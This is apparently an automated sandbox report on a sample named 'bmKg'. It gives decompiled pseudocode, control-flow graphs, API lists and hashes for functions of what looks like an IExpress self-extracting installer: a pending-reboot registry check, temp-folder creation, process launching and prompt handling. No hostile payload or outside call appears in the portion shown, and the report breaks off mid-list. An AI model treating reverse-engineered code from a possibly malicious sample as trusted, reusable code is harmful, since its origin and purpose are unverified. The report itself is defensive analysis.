                              control_flow_graph 519 a7256d-a7257d 520 a72583-a72589 519->520 521 a72622-a72627 call a724e0 519->521 523 a7258b 520->523 524 a725e8-a72607 RegOpenKeyExA 520->524 526 a72629-a7262f 521->526 525 a72591-a72595 523->525 523->526 527 a725e3-a725e6 524->527 528 a72609-a72620 RegQueryInfoKeyA 524->528 525->526 530 a7259b-a725ba RegOpenKeyExA 525->530 527->526 531 a725d1-a725dd RegCloseKey 528->531 530->527 532 a725bc-a725cb RegQueryValueExA 530->532 531->527 532->531
                              C-Code - Quality: 86%
                              			E00A7256D(signed int __ecx) {
                              				int _v8;
                              				void* _v12;
                              				signed int _t13;
                              				signed int _t19;
                              				long _t24;
                              				void* _t26;
                              				int _t31;
                              				void* _t34;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t13 = __ecx & 0x0000ffff;
                              				_t31 = 0;
                              				if(_t13 == 0) {
                              					_t31 = E00A724E0(_t26);
                              				} else {
                              					_t34 = _t13 - 1;
                              					if(_t34 == 0) {
                              						_v8 = 0;
                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                              							goto L7;
                              						} else {
                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                              							goto L6;
                              						}
                              						L12:
                              					} else {
                              						if(_t34 > 0 && __ecx <= 3) {
                              							_v8 = 0;
                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                              							if(_t24 == 0) {
                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                              								L6:
                              								asm("sbb eax, eax");
                              								_v8 = _v8 &  !( ~_t19);
                              								RegCloseKey(_v12); // executed
                              							}
                              							L7:
                              							_t31 = _v8;
                              						}
                              					}
                              				}
                              				return _t31;
                              				goto L12;
                              			}











                              0x00a72572
                              0x00a72573
                              0x00a72575
                              0x00a72578
                              0x00a7257d
                              0x00a72627
                              0x00a72583
                              0x00a72586
                              0x00a72589
                              0x00a725eb
                              0x00a72607
                              0x00000000
                              0x00a72609
                              0x00a7261a
                              0x00000000
                              0x00a7261a
                              0x00000000
                              0x00a7258b
                              0x00a7258b
                              0x00a7259e
                              0x00a725b2
                              0x00a725ba
                              0x00a725cb
                              0x00a725d1
                              0x00a725d6
                              0x00a725da
                              0x00a725dd
                              0x00a725dd
                              0x00a725e3
                              0x00a725e3
                              0x00a725e3
                              0x00a7258b
                              0x00a72589
                              0x00a7262f
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A74096,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?), ref: 00A725B2
                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?,00A74096), ref: 00A725CB
                              • RegCloseKey.KERNELBASE(?,?,00A71ED3,00000001,00000000,?,?,00A74137,?,00A74096), ref: 00A725DD
                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A74096,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?), ref: 00A725FF
                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A74096,00000000,00000000,00000000,00000000,?,00A71ED3,00000001,00000000), ref: 00A7261A
                              Strings
                              • System\CurrentControlSet\Control\Session Manager, xrefs: 00A725A8
                              • PendingFileRenameOperations, xrefs: 00A725C3
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A725F5
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: OpenQuery$CloseInfoValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2209512893-559176071
                              • Opcode ID: e1524e269956faa74cb54c560373bd02bb8b4474d753289efb3cbf356ec53191
                              • Instruction ID: a26655bb452d8a4a9e8aeec9af8541b732ff81ac95684e77f0387cd9e90901d1
                              • Opcode Fuzzy Hash: e1524e269956faa74cb54c560373bd02bb8b4474d753289efb3cbf356ec53191
                              • Instruction Fuzzy Hash: 45113D35A42228BBAB20DB919C0DEFFBEBCEB557A1F10C055B80DA2010D6345A46D7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 533 a76a60-a76a91 call a77155 call a77208 GetStartupInfoW 539 a76a93-a76aa2 533->539 540 a76aa4-a76aa6 539->540 541 a76abc-a76abe 539->541 542 a76aaf-a76aba Sleep 540->542 543 a76aa8-a76aad 540->543 544 a76abf-a76ac5 541->544 542->539 543->544 545 a76ac7-a76acf _amsg_exit 544->545 546 a76ad1-a76ad7 544->546 547 a76b0b-a76b11 545->547 548 a76b05 546->548 549 a76ad9-a76ae9 call a76c3f 546->549 550 a76b13-a76b24 _initterm 547->550 551 a76b2e-a76b30 547->551 548->547 555 a76aee-a76af2 549->555 550->551 553 a76b32-a76b39 551->553 554 a76b3b-a76b42 551->554 553->554 556 a76b67-a76b71 554->556 557 a76b44-a76b51 call a77060 554->557 555->547 558 a76af4-a76b00 555->558 560 a76b74-a76b79 556->560 557->556 567 a76b53-a76b65 557->567 561 a76c39-a76c3e call a7724d 558->561 564 a76bc5-a76bc8 560->564 565 a76b7b-a76b7d 560->565 568 a76bd6-a76be3 _ismbblead 564->568 569 a76bca-a76bd3 564->569 570 a76b94-a76b98 565->570 571 a76b7f-a76b81 565->571 567->556 575 a76be5-a76be6 568->575 576 a76be9-a76bed 568->576 569->568 573 a76ba0-a76ba2 570->573 574 a76b9a-a76b9e 570->574 571->564 572 a76b83-a76b85 571->572 572->570 577 a76b87-a76b8a 572->577 578 a76ba3-a76bbc call a72bfb 573->578 574->578 575->576 576->560 580 a76c1e-a76c25 576->580 577->570 581 a76b8c-a76b92 577->581 578->580 586 a76bbe-a76bbf exit 578->586 583 a76c27-a76c2d _cexit 580->583 584 a76c32 580->584 581->572 583->584 584->561 586->564
                              C-Code - Quality: 51%
                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				signed int* _t25;
                              				signed int _t26;
                              				signed int _t29;
                              				int _t30;
                              				signed int _t37;
                              				signed char _t41;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				signed int _t58;
                              				signed int _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				void* _t67;
                              				void* _t68;
                              
                              				E00A77155();
                              				_push(0x58);
                              				_push(0xa772b8);
                              				E00A77208(__ebx, __edi, __esi);
                              				 *(_t62 - 0x20) = 0;
                              				GetStartupInfoW(_t62 - 0x68);
                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                              				_t53 = 0;
                              				while(1) {
                              					asm("lock cmpxchg [edx], ecx");
                              					if(0 == 0) {
                              						break;
                              					}
                              					if(0 != _t56) {
                              						Sleep(0x3e8);
                              						continue;
                              					} else {
                              						_t58 = 1;
                              						_t53 = 1;
                              					}
                              					L7:
                              					_t67 =  *0xa788b0 - _t58; // 0x2
                              					if(_t67 != 0) {
                              						__eflags =  *0xa788b0; // 0x2
                              						if(__eflags != 0) {
                              							 *0xa781e4 = _t58;
                              							goto L13;
                              						} else {
                              							 *0xa788b0 = _t58;
                              							_t37 = E00A76C3F(0xa710b8, 0xa710c4); // executed
                              							__eflags = _t37;
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              								_t30 = 0xff;
                              							}
                              						}
                              					} else {
                              						_push(0x1f);
                              						L00A76FF4();
                              						L13:
                              						_t68 =  *0xa788b0 - _t58; // 0x2
                              						if(_t68 == 0) {
                              							_push(0xa710b4);
                              							_push(0xa710ac);
                              							L00A77202();
                              							 *0xa788b0 = 2;
                              						}
                              						if(_t53 == 0) {
                              							 *0xa788ac = 0;
                              						}
                              						_t71 =  *0xa788b4;
                              						if( *0xa788b4 != 0 && E00A77060(_t71, 0xa788b4) != 0) {
                              							_t60 =  *0xa788b4; // 0x0
                              							 *0xa7a288(0, 2, 0);
                              							 *_t60();
                              						}
                              						_t25 = __imp___acmdln; // 0x76235b9c
                              						_t59 =  *_t25;
                              						 *(_t62 - 0x1c) = _t59;
                              						_t54 =  *(_t62 - 0x20);
                              						while(1) {
                              							_t41 =  *_t59;
                              							if(_t41 > 0x20) {
                              								goto L32;
                              							}
                              							if(_t41 != 0) {
                              								if(_t54 != 0) {
                              									goto L32;
                              								} else {
                              									while(_t41 != 0 && _t41 <= 0x20) {
                              										_t59 = _t59 + 1;
                              										 *(_t62 - 0x1c) = _t59;
                              										_t41 =  *_t59;
                              									}
                              								}
                              							}
                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                              								_t29 = 0xa;
                              							} else {
                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                              							}
                              							_push(_t29);
                              							_t30 = E00A72BFB(0xa70000, 0, _t59); // executed
                              							 *0xa781e0 = _t30;
                              							__eflags =  *0xa781f8;
                              							if( *0xa781f8 == 0) {
                              								exit(_t30); // executed
                              								goto L32;
                              							}
                              							__eflags =  *0xa781e4;
                              							if( *0xa781e4 == 0) {
                              								__imp___cexit();
                              								_t30 =  *0xa781e0; // 0x0
                              							}
                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              							goto L40;
                              							L32:
                              							__eflags = _t41 - 0x22;
                              							if(_t41 == 0x22) {
                              								__eflags = _t54;
                              								_t15 = _t54 == 0;
                              								__eflags = _t15;
                              								_t54 = 0 | _t15;
                              								 *(_t62 - 0x20) = _t54;
                              							}
                              							_t26 = _t41 & 0x000000ff;
                              							__imp___ismbblead(_t26);
                              							__eflags = _t26;
                              							if(_t26 != 0) {
                              								_t59 = _t59 + 1;
                              								__eflags = _t59;
                              								 *(_t62 - 0x1c) = _t59;
                              							}
                              							_t59 = _t59 + 1;
                              							 *(_t62 - 0x1c) = _t59;
                              						}
                              					}
                              					L40:
                              					return E00A7724D(_t30);
                              				}
                              				_t58 = 1;
                              				__eflags = 1;
                              				goto L7;
                              			}


















                              0x00a76a60
                              0x00a76a6a
                              0x00a76a6c
                              0x00a76a71
                              0x00a76a78
                              0x00a76a7f
                              0x00a76a85
                              0x00a76a8e
                              0x00a76a91
                              0x00a76a93
                              0x00a76a9c
                              0x00a76aa2
                              0x00000000
                              0x00000000
                              0x00a76aa6
                              0x00a76ab4
                              0x00000000
                              0x00a76aa8
                              0x00a76aaa
                              0x00a76aab
                              0x00a76aab
                              0x00a76abf
                              0x00a76abf
                              0x00a76ac5
                              0x00a76ad1
                              0x00a76ad7
                              0x00a76b05
                              0x00000000
                              0x00a76ad9
                              0x00a76ad9
                              0x00a76ae9
                              0x00a76af0
                              0x00a76af2
                              0x00000000
                              0x00a76af4
                              0x00a76af4
                              0x00a76afb
                              0x00a76afb
                              0x00a76af2
                              0x00a76ac7
                              0x00a76ac7
                              0x00a76ac9
                              0x00a76b0b
                              0x00a76b0b
                              0x00a76b11
                              0x00a76b13
                              0x00a76b18
                              0x00a76b1d
                              0x00a76b24
                              0x00a76b24
                              0x00a76b30
                              0x00a76b39
                              0x00a76b39
                              0x00a76b3b
                              0x00a76b42
                              0x00a76b57
                              0x00a76b5f
                              0x00a76b65
                              0x00a76b65
                              0x00a76b67
                              0x00a76b6c
                              0x00a76b6e
                              0x00a76b71
                              0x00a76b74
                              0x00a76b74
                              0x00a76b79
                              0x00000000
                              0x00000000
                              0x00a76b7d
                              0x00a76b81
                              0x00000000
                              0x00000000
                              0x00a76b83
                              0x00a76b8c
                              0x00a76b8d
                              0x00a76b90
                              0x00a76b90
                              0x00a76b83
                              0x00a76b81
                              0x00a76b94
                              0x00a76b98
                              0x00a76ba2
                              0x00a76b9a
                              0x00a76b9a
                              0x00a76b9a
                              0x00a76ba3
                              0x00a76bab
                              0x00a76bb0
                              0x00a76bb5
                              0x00a76bbc
                              0x00a76bbf
                              0x00000000
                              0x00a76bbf
                              0x00a76c1e
                              0x00a76c25
                              0x00a76c27
                              0x00a76c2d
                              0x00a76c2d
                              0x00a76c32
                              0x00000000
                              0x00a76bc5
                              0x00a76bc5
                              0x00a76bc8
                              0x00a76bcc
                              0x00a76bce
                              0x00a76bce
                              0x00a76bd1
                              0x00a76bd3
                              0x00a76bd3
                              0x00a76bd6
                              0x00a76bda
                              0x00a76be1
                              0x00a76be3
                              0x00a76be5
                              0x00a76be5
                              0x00a76be6
                              0x00a76be6
                              0x00a76be9
                              0x00a76bea
                              0x00a76bea
                              0x00a76b74
                              0x00a76c39
                              0x00a76c3e
                              0x00a76c3e
                              0x00a76abe
                              0x00a76abe
                              0x00000000

                              APIs
                                • Part of subcall function 00A77155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A77182
                                • Part of subcall function 00A77155: GetCurrentProcessId.KERNEL32 ref: 00A77191
                                • Part of subcall function 00A77155: GetCurrentThreadId.KERNEL32 ref: 00A7719A
                                • Part of subcall function 00A77155: GetTickCount.KERNEL32 ref: 00A771A3
                                • Part of subcall function 00A77155: QueryPerformanceCounter.KERNEL32(?), ref: 00A771B8
                              • GetStartupInfoW.KERNEL32(?,00A772B8,00000058), ref: 00A76A7F
                              • Sleep.KERNEL32(000003E8), ref: 00A76AB4
                              • _amsg_exit.MSVCRT ref: 00A76AC9
                              • _initterm.MSVCRT ref: 00A76B1D
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A76B49
                              • exit.KERNELBASE ref: 00A76BBF
                              • _ismbblead.MSVCRT ref: 00A76BDA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                              • String ID:
                              • API String ID: 836923961-0
                              • Opcode ID: 9f3efda9e6acd7a1102c897e80294d181fa03085cb9b0a869826e4d56c6420d4
                              • Instruction ID: 94e8479e2ae084a1981432b14ad5fbd368cd020c0795b8ce497599e795e126ef
                              • Opcode Fuzzy Hash: 9f3efda9e6acd7a1102c897e80294d181fa03085cb9b0a869826e4d56c6420d4
                              • Instruction Fuzzy Hash: EA41F631984B25DBDB21DBA8DD087AE77F4FB85761F54C12AE84DE3291CF7448828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 587 a758c8-a758d5 588 a758d8-a758dd 587->588 588->588 589 a758df-a758f1 LocalAlloc 588->589 590 a758f3-a75901 call a744b9 589->590 591 a75919-a75959 call a71680 call a7658a CreateFileA LocalFree 589->591 594 a75906-a75910 call a76285 590->594 591->594 601 a7595b-a7596c CloseHandle GetFileAttributesA 591->601 600 a75912-a75918 594->600 601->594 602 a7596e-a75970 601->602 602->594 603 a75972-a7597b 602->603 603->600
                              C-Code - Quality: 95%
                              			E00A758C8(intOrPtr* __ecx) {
                              				void* _v8;
                              				intOrPtr _t6;
                              				void* _t10;
                              				void* _t12;
                              				void* _t14;
                              				signed char _t16;
                              				void* _t20;
                              				void* _t23;
                              				intOrPtr* _t27;
                              				CHAR* _t33;
                              
                              				_push(__ecx);
                              				_t33 = __ecx;
                              				_t27 = __ecx;
                              				_t23 = __ecx + 1;
                              				do {
                              					_t6 =  *_t27;
                              					_t27 = _t27 + 1;
                              				} while (_t6 != 0);
                              				_t36 = _t27 - _t23 + 0x14;
                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                              				if(_t20 != 0) {
                              					E00A71680(_t20, _t36, _t33);
                              					E00A7658A(_t20, _t36, "TMP4351$.TMP");
                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                              					_v8 = _t10;
                              					LocalFree(_t20);
                              					_t12 = _v8;
                              					if(_t12 == 0xffffffff) {
                              						goto L4;
                              					} else {
                              						CloseHandle(_t12);
                              						_t16 = GetFileAttributesA(_t33); // executed
                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                              							goto L4;
                              						} else {
                              							 *0xa79124 = 0;
                              							_t14 = 1;
                              						}
                              					}
                              				} else {
                              					E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					L4:
                              					 *0xa79124 = E00A76285();
                              					_t14 = 0;
                              				}
                              				return _t14;
                              			}













                              0x00a758cd
                              0x00a758d1
                              0x00a758d3
                              0x00a758d5
                              0x00a758d8
                              0x00a758d8
                              0x00a758da
                              0x00a758db
                              0x00a758e1
                              0x00a758ed
                              0x00a758f1
                              0x00a7591e
                              0x00a7592c
                              0x00a75943
                              0x00a7594a
                              0x00a7594d
                              0x00a75953
                              0x00a75959
                              0x00000000
                              0x00a7595b
                              0x00a7595c
                              0x00a75963
                              0x00a7596c
                              0x00000000
                              0x00a75972
                              0x00a75974
                              0x00a7597a
                              0x00a7597a
                              0x00a7596c
                              0x00a758f3
                              0x00a75901
                              0x00a75906
                              0x00a7590b
                              0x00a75910
                              0x00a75910
                              0x00a75918

                              APIs
                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A758E7
                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75943
                              • LocalFree.KERNEL32(00000000,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7594D
                              • CloseHandle.KERNEL32(00000000,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7595C
                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75963
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                              • API String ID: 747627703-3033780695
                              • Opcode ID: 174165f72f13bcd4f338980ea7a0fafb1bddb4cf833b8b592f8e4d22cf7493ea
                              • Instruction ID: dbf972e3de1244703ba4074509ae52bdf73768959dc5bff859879203882a1e2f
                              • Opcode Fuzzy Hash: 174165f72f13bcd4f338980ea7a0fafb1bddb4cf833b8b592f8e4d22cf7493ea
                              • Instruction Fuzzy Hash: 7F11E671B0061177D7249FB95C4DB9B7F99EF86360F10CA25B60DD3191DBB0984686A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 631 a73fef-a74010 632 a74016-a7403b CreateProcessA 631->632 633 a7410a-a7411a call a76ce0 631->633 634 a740c4-a74101 call a76285 GetLastError FormatMessageA call a744b9 632->634 635 a74041-a7406e WaitForSingleObject GetExitCodeProcess 632->635 650 a74106 634->650 638 a74091 call a7411b 635->638 639 a74070-a74077 635->639 644 a74096-a740b8 CloseHandle * 2 638->644 639->638 643 a74079-a7407b 639->643 643->638 646 a7407d-a74089 643->646 648 a740ba-a740c0 644->648 649 a74108 644->649 646->638 647 a7408b 646->647 647->638 648->649 651 a740c2 648->651 649->633 650->649 651->650
                              C-Code - Quality: 84%
                              			E00A73FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                              				signed int _v8;
                              				char _v524;
                              				long _v528;
                              				struct _PROCESS_INFORMATION _v544;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t20;
                              				void* _t22;
                              				int _t25;
                              				intOrPtr* _t39;
                              				signed int _t44;
                              				void* _t49;
                              				signed int _t50;
                              				intOrPtr _t53;
                              
                              				_t45 = __edx;
                              				_t20 =  *0xa78004; // 0x74742267
                              				_v8 = _t20 ^ _t50;
                              				_t39 = __ecx;
                              				_t49 = 1;
                              				_t22 = 0;
                              				if(__ecx == 0) {
                              					L13:
                              					return E00A76CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                              				}
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                              				if(_t25 == 0) {
                              					 *0xa79124 = E00A76285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                              					_t45 = 0x4c4;
                              					E00A744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                              					L11:
                              					_t49 = 0;
                              					L12:
                              					_t22 = _t49;
                              					goto L13;
                              				}
                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                              				_t44 = _v528;
                              				_t53 =  *0xa78a28; // 0x0
                              				if(_t53 == 0) {
                              					_t34 =  *0xa79a2c; // 0x0
                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                              						_t34 = _t44 & 0xff000000;
                              						if((_t44 & 0xff000000) == 0xaa000000) {
                              							 *0xa79a2c = _t44;
                              						}
                              					}
                              				}
                              				E00A7411B(_t34, _t44);
                              				CloseHandle(_v544.hThread);
                              				CloseHandle(_v544);
                              				if(( *0xa79a34 & 0x00000400) == 0 || _v528 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}


















                              0x00a73fef
                              0x00a73ffa
                              0x00a74001
                              0x00a74008
                              0x00a7400a
                              0x00a7400b
                              0x00a74010
                              0x00a7410a
                              0x00a7411a
                              0x00a7411a
                              0x00a7401c
                              0x00a7401d
                              0x00a7401e
                              0x00a7401f
                              0x00a74033
                              0x00a7403b
                              0x00a740ca
                              0x00a740e9
                              0x00a740f8
                              0x00a74101
                              0x00a74106
                              0x00a74106
                              0x00a74108
                              0x00a74108
                              0x00000000
                              0x00a74108
                              0x00a74049
                              0x00a7405c
                              0x00a74062
                              0x00a74068
                              0x00a7406e
                              0x00a74070
                              0x00a74077
                              0x00a7407f
                              0x00a74089
                              0x00a7408b
                              0x00a7408b
                              0x00a74089
                              0x00a74077
                              0x00a74091
                              0x00a7409c
                              0x00a740a8
                              0x00a740b8
                              0x00000000
                              0x00a740c2
                              0x00000000
                              0x00a740c2

                              APIs
                              • CreateProcessA.KERNELBASE ref: 00A74033
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A74049
                              • GetExitCodeProcess.KERNELBASE ref: 00A7405C
                              • CloseHandle.KERNEL32(?), ref: 00A7409C
                              • CloseHandle.KERNEL32(?), ref: 00A740A8
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A740DC
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A740E9
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                              • String ID:
                              • API String ID: 3183975587-0
                              • Opcode ID: fd5343a6f8aabd8f9e6bcf5f508c0a83bdcaba0392feb1340a941f766b2bbf48
                              • Instruction ID: 194c146b7e53ac0bd5957ee26d61ca8cf7872b1d361d0279992b054e813714a0
                              • Opcode Fuzzy Hash: fd5343a6f8aabd8f9e6bcf5f508c0a83bdcaba0392feb1340a941f766b2bbf48
                              • Instruction Fuzzy Hash: 8F317E31641218BBEB209BA5DC49FAB777CEBD8701F10C2A9F50DD2161C7344DC6CA65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 652 a751e5-a7520b call a7468f LocalAlloc 655 a7522d-a7523c call a7468f 652->655 656 a7520d-a75228 call a744b9 call a76285 652->656 661 a75262-a75270 lstrcmpA 655->661 662 a7523e-a75260 call a744b9 LocalFree 655->662 668 a752b0 656->668 666 a75272-a75273 LocalFree 661->666 667 a7527e-a7529c call a744b9 LocalFree 661->667 662->668 670 a75279-a7527c 666->670 674 a752a6 667->674 675 a7529e-a752a4 667->675 672 a752b2-a752b5 668->672 670->672 674->668 675->670
                              C-Code - Quality: 100%
                              			E00A751E5(void* __eflags) {
                              				int _t5;
                              				void* _t6;
                              				void* _t28;
                              
                              				_t1 = E00A7468F("UPROMPT", 0, 0) + 1; // 0x1
                              				_t28 = LocalAlloc(0x40, _t1);
                              				if(_t28 != 0) {
                              					if(E00A7468F("UPROMPT", _t28, _t29) != 0) {
                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                              						if(_t5 != 0) {
                              							_t6 = E00A744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                              							LocalFree(_t28);
                              							if(_t6 != 6) {
                              								 *0xa79124 = 0x800704c7;
                              								L10:
                              								return 0;
                              							}
                              							 *0xa79124 = 0;
                              							L6:
                              							return 1;
                              						}
                              						LocalFree(_t28);
                              						goto L6;
                              					}
                              					E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree(_t28);
                              					 *0xa79124 = 0x80070714;
                              					goto L10;
                              				}
                              				E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0xa79124 = E00A76285();
                              				goto L10;
                              			}






                              0x00a751fb
                              0x00a75207
                              0x00a7520b
                              0x00a7523c
                              0x00a75268
                              0x00a75270
                              0x00a7528b
                              0x00a75293
                              0x00a7529c
                              0x00a752a6
                              0x00a752b0
                              0x00000000
                              0x00a752b0
                              0x00a7529e
                              0x00a75279
                              0x00000000
                              0x00a7527b
                              0x00a75273
                              0x00000000
                              0x00a75273
                              0x00a7524a
                              0x00a75250
                              0x00a75256
                              0x00000000
                              0x00a75256
                              0x00a75219
                              0x00a75223
                              0x00000000

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
